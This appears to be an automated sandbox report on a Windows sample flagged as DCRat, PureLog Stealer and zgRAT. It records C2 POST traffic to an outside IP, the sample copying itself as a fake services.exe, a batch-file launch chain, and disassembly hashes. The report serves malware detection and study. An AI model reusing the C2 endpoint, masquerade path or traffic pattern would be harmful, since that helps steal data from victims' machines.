                                                              Data Ascii: 98: ;%<*3)<-)X=/4",>>0>,!26<3*1.X"#U)3?U=7*[<-:X'?S2\4X<'=>]8/+> $&+Q&X&,/U&1>=X >(>84;/_#(%*Y$?<%>#T-,H1]V0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              70 | 192.168.2.5 | 50010 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:49:02.214210987 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:02.565342903 CET | 2536 | OUT | Data Raw: 58 51 43 56 5d 58 52 53 55 5e 55 5a 54 5d 50 52 57 5b 5c 58 52 5e 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XQCV]XRSU^UZT]PRW[\XR^QW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY D:'26*!*.Y%/#,8!#9'25?$?(8X=!_.#Q,>
                                                              Dec 21, 2024 10:49:03.595254898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:03.826407909 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:03 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              71 | 192.168.2.5 | 50016 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:49:04.074954987 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:49:04.424951077 CET | 2536 | OUT | Data Raw: 58 53 46 53 5d 5d 52 54 55 5e 55 5a 54 59 50 5d 57 52 5c 5d 52 5e 51 56 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XSFS]]RTU^UZTYP]WR\]R^QV_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY -0W%>=U?16-'$,.=Q4-\22U*4#>-Y*%!_.#Q,.
                                                              Dec 21, 2024 10:49:05.452729940 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:05.686933994 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:05 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              72 | 192.168.2.5 | 50022 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:49:05.932707071 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:06.284308910 CET | 2536 | OUT | Data Raw: 58 56 43 54 5d 59 57 51 55 5e 55 5a 54 5e 50 56 57 59 5c 54 52 56 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVCT]YWQU^UZT^PVWY\TRVQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY .!$T26*2:,?83</.8!W","&5+43+=/=5!_.#Q,2
                                                              Dec 21, 2024 10:49:07.313076973 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:07.546442032 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:07 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              73 | 192.168.2.5 | 50028 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:49:07.817017078 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:08.174614906 CET | 2532 | OUT | Data Raw: 5d 52 43 50 5d 58 57 52 55 5e 55 5a 54 5b 50 54 57 5a 5c 59 52 5e 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]RCP]XWRU^UZT[PTWZ\YR^Q\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#9#%>5?1>. 3(U:&7/Z2"?$8</=!_.#Q,"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              74 | 192.168.2.5 | 50029 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:49:08.546477079 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2084
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:08.893526077 CET | 2084 | OUT | Data Raw: 5d 56 46 57 5d 5a 52 55 55 5e 55 5a 54 5e 50 57 57 5a 5c 55 52 56 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VFW]ZRUU^UZT^PWWZ\URVQ__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY -! S1==Q)169?3 T:;)#-\%2W<+Z?>?)!_.#Q,2
                                                              Dec 21, 2024 10:49:09.930911064 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:10.166493893 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:09 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 1c 37 05 2d 1e 2b 2a 05 12 3e 06 26 54 2b 3e 0b 07 2f 22 33 5e 21 3c 3a 12 2a 3e 24 00 30 07 30 01 35 04 29 59 22 3c 34 06 29 21 2e 58 01 1e 21 06 21 23 2a 0b 30 3f 0e 0d 2a 27 26 5e 28 58 21 01 24 2c 33 52 32 04 24 14 28 03 24 54 25 04 39 04 2c 2c 33 12 2b 3d 28 50 30 0c 2b 51 03 1e 26 12 25 02 23 1e 32 0a 3a 07 25 00 29 5f 23 2d 30 0c 3d 28 3c 09 23 2b 22 5f 38 2a 38 58 29 3e 3a 10 2a 01 2d 00 24 2c 2f 16 32 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 9897-+*>&T+>/"3^!<:*>$005)Y"<4)!.X!!#*0?*'&^(X!$,3R2$($T%9,,3+=(P0+Q&%#2:%)_#-0=(<#+"_8*8X)>:*-$,/2>#T-,H1]V0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              75 | 192.168.2.5 | 50030 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:49:08.727204084 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:09.081408024 CET | 2536 | OUT | Data Raw: 58 5e 43 5e 58 5d 52 54 55 5e 55 5a 54 52 50 54 57 5c 5c 59 52 50 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: X^C^X]RTU^UZTRPTW\\YRPQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY E-11-"*).Y$\'?3-8>7,*2"5?4([;*5!_.#Q,
                                                              Dec 21, 2024 10:49:10.104902983 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:10.338294029 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:10 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Target ID:0
                                                              Start time:04:47:04
                                                              Start date:21/12/2024
                                                              Path:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\XNPOazHpXF.exe"
                                                              Imagebase:0xfb0000
                                                              File size:10'393'088 bytes
                                                              MD5 hash:ADAE028E0A5A72D219A02BB06D92241A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2052319303.0000000000FB2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:04:47:10
                                                              Start date:21/12/2024
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat"
                                                              Imagebase:0x7ff650e30000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:04:47:10
                                                              Start date:21/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:04:47:10
                                                              Start date:21/12/2024
                                                              Path:C:\Windows\System32\chcp.com
                                                              Wow64 process (32bit):false
                                                              Commandline:chcp 65001
                                                              Imagebase:0x7ff71f490000
                                                              File size:14'848 bytes
                                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:04:47:10
                                                              Start date:21/12/2024
                                                              Path:C:\Windows\System32\PING.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:ping -n 10 localhost
                                                              Imagebase:0x7ff7ffec0000
                                                              File size:22'528 bytes
                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:04:47:19
                                                              Start date:21/12/2024
                                                              Path:C:\Windows\InputMethod\CHT\services.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\InputMethod\CHT\services.exe"
                                                              Imagebase:0xa60000
                                                              File size:10'393'088 bytes
                                                              MD5 hash:ADAE028E0A5A72D219A02BB06D92241A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.3303823064.0000000003794000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\InputMethod\CHT\services.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\InputMethod\CHT\services.exe, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 74%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:false

                                                                Execution Graph

                                                                Execution Coverage:5%
                                                                Dynamic/Decrypted Code Coverage:75%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:12
                                                                Total number of Limit Nodes:0
                                                                execution_graph 22286 7ff8490d0915 22287 7ff8490d092f GetFileAttributesW 22286->22287 22289 7ff8490d09f5 22287->22289 22298 7ff8490cea60 22299 7ff8490cea6a ResumeThread 22298->22299 22301 7ff8490ceb74 22299->22301 22290 7ff8490cd1fd 22291 7ff8490cd20b SuspendThread 22290->22291 22293 7ff8490cd2e4 22291->22293 22294 7ff8490cebc9 22295 7ff8490cebd7 CloseHandle 22294->22295 22297 7ff8490cecb4 22295->22297
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8295980656dc7011769144b89e13592a524fce32a49370ccb7cc3e734748fcf
                                                                • Instruction ID: 91764d7d9d8e4a659b5fb2c3efa77f99ba1fddb0320e31e2c273a3664d12d232
                                                                • Opcode Fuzzy Hash: e8295980656dc7011769144b89e13592a524fce32a49370ccb7cc3e734748fcf
                                                                • Instruction Fuzzy Hash: A7A1ED7191DA8A8FE789EB68C8583BABFF2FB95350F00017AD009D72D2CB791855CB51

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8^cI$`6wI
                                                                • API String ID: 0-3787090860
                                                                • Opcode ID: 72dbddf13ab8b05087d58e8f418e316f058a746ad29c3b4bfa6caeb068645af4
                                                                • Instruction ID: 39515908bedff7f0882cf1507daf57decd0618dd3538d39fa522fa5e65dd294b
                                                                • Opcode Fuzzy Hash: 72dbddf13ab8b05087d58e8f418e316f058a746ad29c3b4bfa6caeb068645af4
                                                                • Instruction Fuzzy Hash: 54224632C1F6D69FE375BF68A8650F67FA0EF12698B0801B7D08C8E093DE1D64498359

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PlI$\^H
                                                                • API String ID: 0-1564205966
                                                                • Opcode ID: 53130bdd9b3784fd905374dcf9c7753befc024f7b7394b5dfd2c5539c9e2106e
                                                                • Instruction ID: ae0fdaa79e11fd27efcb8a767054802b0b8bb74d0cdb2f44a421d71a1b5ec04c
                                                                • Opcode Fuzzy Hash: 53130bdd9b3784fd905374dcf9c7753befc024f7b7394b5dfd2c5539c9e2106e
                                                                • Instruction Fuzzy Hash: 81A1A035E0DA8A8FE7A5FF2888646B87BE1FF55341F5941FAC00DCB192DE2C98098751

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 0796430b9ab4ff3f047f93068b0a4a9c5b5b6ff2fb054c8e075d73d38671018c
                                                                • Instruction ID: 595cde83a5508cb3cdbea9fce804ac85b9820edc9f20911df9b9d5aca109ddb7
                                                                • Opcode Fuzzy Hash: 0796430b9ab4ff3f047f93068b0a4a9c5b5b6ff2fb054c8e075d73d38671018c
                                                                • Instruction Fuzzy Hash: 5012B530D0DA8A9FE76AFF64C4586B9BBA0FF55340F1441BAD04EC7682DB38A841CB51

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HtbI
                                                                • API String ID: 0-1960288083
                                                                • Opcode ID: f9b1906a07a7abb42a4b3ee2cf5a27a77149a047dff15f56fddea93176200bba
                                                                • Instruction ID: 3b176b10d212e2f225731a68722e6a78ef2c0ceb85083f1356d1eac35395d5b5
                                                                • Opcode Fuzzy Hash: f9b1906a07a7abb42a4b3ee2cf5a27a77149a047dff15f56fddea93176200bba
                                                                • Instruction Fuzzy Hash: A802EF30A5DA8A8FE379FF28D4905B977E1FF45380B54057EC48EC7682DB29B8468B41

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 484 7ff8490cea60-7ff8490cea99 486 7ff8490cea9c-7ff8490ceb72 ResumeThread 484->486 487 7ff8490cea9b 484->487 491 7ff8490ceb74 486->491 492 7ff8490ceb7a-7ff8490cebc4 486->492 487->486 491->492
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 4440b9fca93dee43d99ac15c0c72a1c9c9925ebd855cd9a46a8c6b54a6b86ce4
                                                                • Instruction ID: 9a065a1edecfa713ab018a3b6cdac50479818929f73790221a6d4d3baacc9a6f
                                                                • Opcode Fuzzy Hash: 4440b9fca93dee43d99ac15c0c72a1c9c9925ebd855cd9a46a8c6b54a6b86ce4
                                                                • Instruction Fuzzy Hash: 37517C7090D78C8FDB59DFA8C858AE9BFF0EF56310F0441ABD049D7252CA79A846CB11

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 495 7ff8490cd1fd-7ff8490cd209 496 7ff8490cd214-7ff8490cd2e2 SuspendThread 495->496 497 7ff8490cd20b-7ff8490cd213 495->497 501 7ff8490cd2e4 496->501 502 7ff8490cd2ea-7ff8490cd334 496->502 497->496 501->502
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID: SuspendThread
                                                                • String ID:
                                                                • API String ID: 3178671153-0
                                                                • Opcode ID: b3a00483c1683e00a38fb35b0e2b9fc5e68c7d5b6559266c763a14c23809b6fc
                                                                • Instruction ID: b5f0e6ce96a49fd185eb0a6ed9b4aeaddb4db48d7cac1a813b1624ce9d70519b
                                                                • Opcode Fuzzy Hash: b3a00483c1683e00a38fb35b0e2b9fc5e68c7d5b6559266c763a14c23809b6fc
                                                                • Instruction Fuzzy Hash: 18412A70D0864D8FDB58DF98D885AADBBF0FB5A310F10416AD049E7252DB74A885CB45

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 505 7ff8490d0915-7ff8490d09f3 GetFileAttributesW 509 7ff8490d09f5 505->509 510 7ff8490d09fb-7ff8490d0a39 505->510 509->510
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: a70208a3f6885741f54831d46b35889b8bb970050a5aa909cd03cc49e2bd0c3e
                                                                • Instruction ID: df51b25a5382804e78af61bb34bdf9f71a3e5f161967c29ff04a1f010c1be989
                                                                • Opcode Fuzzy Hash: a70208a3f6885741f54831d46b35889b8bb970050a5aa909cd03cc49e2bd0c3e
                                                                • Instruction Fuzzy Hash: 0541197090865C8FDB98EF98D889BEDBBF0FB59310F10416ED04DE7252DA74A885CB54

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H{uI
                                                                • API String ID: 0-2047368440
                                                                • Opcode ID: a900dd1b1b4eacf348088065a5e9f488ab464a9f823bf8f04f8046ddc01ea657
                                                                • Instruction ID: aca9bdcda506797031f4dccefc9d7e09a5302bfc976d3391934ff4369ad2d015
                                                                • Opcode Fuzzy Hash: a900dd1b1b4eacf348088065a5e9f488ab464a9f823bf8f04f8046ddc01ea657
                                                                • Instruction Fuzzy Hash: 08713371C1DA8E9FE760FF68D8466FEBBB0FF45390F1401BAD149D7192EA2868458780

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: X;`I
                                                                • API String ID: 0-1832804531
                                                                • Opcode ID: 7f521cb70fdf6a49dccff45971314c773e7616ba2fa65488b5e0b1a248004029
                                                                • Instruction ID: fb1909f3df0ec6ac21aa73503605ed38a4c0cb397d0ba298ec3c9473e7f9dc05
                                                                • Opcode Fuzzy Hash: 7f521cb70fdf6a49dccff45971314c773e7616ba2fa65488b5e0b1a248004029
